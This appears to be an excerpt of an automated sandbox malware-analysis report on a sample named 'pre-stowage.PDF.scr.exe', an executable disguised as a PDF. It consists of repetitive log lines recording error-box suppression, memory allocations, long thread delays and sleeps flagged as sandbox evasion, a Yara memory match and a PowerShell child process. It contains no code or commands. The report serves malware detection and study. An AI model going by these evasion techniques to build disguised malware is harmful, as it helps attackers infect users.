                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTR
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory allocated: 97E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory allocated: A7E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory allocated: AA00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory allocated: BA00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory allocated: BE40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory allocated: CE40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory allocated: DE40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory allocated: EB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory allocated: 2720000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239875Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239764Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239654Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239523Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239406Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239297Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239187Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239078Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 238967Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 238741Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 238597Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 238442Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 238283Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 238092Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 237970Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 237650Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599763Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599657Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599532Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599405Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599297Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599078Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598969Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598844Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598734Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598625Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598516Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598407Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598282Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598157Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598032Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597813Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597688Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597563Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597438Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597313Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597204Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597079Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596954Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596829Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596704Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596579Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596454Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596329Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596204Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596079Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595954Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595829Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595704Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595579Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595454Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595329Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595204Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595079Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594954Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594829Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594704Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594579Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594454Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594329Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594204Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594079Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeWindow / User API: threadDelayed 1599Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeWindow / User API: threadDelayed 1291Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7585Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2121Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeWindow / User API: threadDelayed 1558Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeWindow / User API: threadDelayed 8267Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239764s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239654s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239523s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -238967s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -238741s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -238597s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -238442s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -238283s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -238092s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -237970s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -237650s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7396Thread sleep count: 1558 > 30Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599763s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599657s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7396Thread sleep count: 8267 > 30Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599532s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599405s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598969s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598625s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598407s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598282s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598157s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598032s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597204s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597079s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596954s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596829s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596704s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596579s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596454s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596329s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596204s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596079s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595954s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595829s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595704s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595579s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595454s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595329s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595204s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595079s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594954s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594829s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594704s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594579s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594454s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594329s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594204s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594079s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239875Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239764Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239654Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239523Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239406Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239297Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239187Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239078Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 238967Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 238741Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 238597Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 238442Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 238283Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 238092Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 237970Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 237650Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599763Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599657Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599532Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599405Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599297Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 599078Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598969Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598844Jump to behavior
